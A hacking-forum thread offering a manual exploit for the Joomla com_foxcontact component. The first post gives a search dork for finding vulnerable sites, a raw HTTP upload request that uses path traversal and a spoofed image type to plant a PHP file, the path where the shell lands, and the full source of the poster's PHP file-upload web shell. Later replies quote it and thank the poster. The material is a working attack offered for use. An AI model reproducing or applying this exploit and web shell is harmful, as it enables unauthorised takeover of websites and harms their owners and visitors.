Exploit com_foxcontact upload shell (2 Viewers)

Joined
May 5, 2019
Credits
132
Rating - 0%
Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use a burp suite
dork inurl:com_foxcontact

-HTTP Header Example-
View hidden content is available for registered users!

POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?php cmd or file upload ?>

############################

Shell path:
View hidden content is available for registered users!

www.site.com/components/com_foxcontact/filename.php

###########################
my script upload :) :)
View hidden content is available for registered users!

<?php
echo "<center>";
$files = @$_FILES["files"];

if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
}
}echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
background-color: #000000;
font: bold;
font-size: 20px;
}
b{
color:#FF0000;
font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ<b><br><br>

<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "<center/>";
?>

video
View hidden content is available for registered users!
bakalım
 
Joined
Mar 14, 2020
Credits
0
Rating - 0%
[QUOTE = "sohaip, post: 68367, member: 1711"]
Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use a burp suite
dork inurl: com_foxcontact

-HTTP Header Example-
[Hidden content]
############################

Shell path:
[Hidden content]
###########################
upload my script :) :)
[Hidden content]
video
[Hidden content]
[/ QUOTE]
greate
 
Joined
Apr 14, 2020
Credits
0
Rating - 0%
Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use a burp suite
dork inurl:com_foxcontact

-HTTP Header Example-
[Gizli içerik]
############################

Shell path:
[Gizli içerik]
###########################
my script upload :) :)
[Gizli içerik]
video
[Gizli içerik]
C
 

Users who are viewing this thread

Top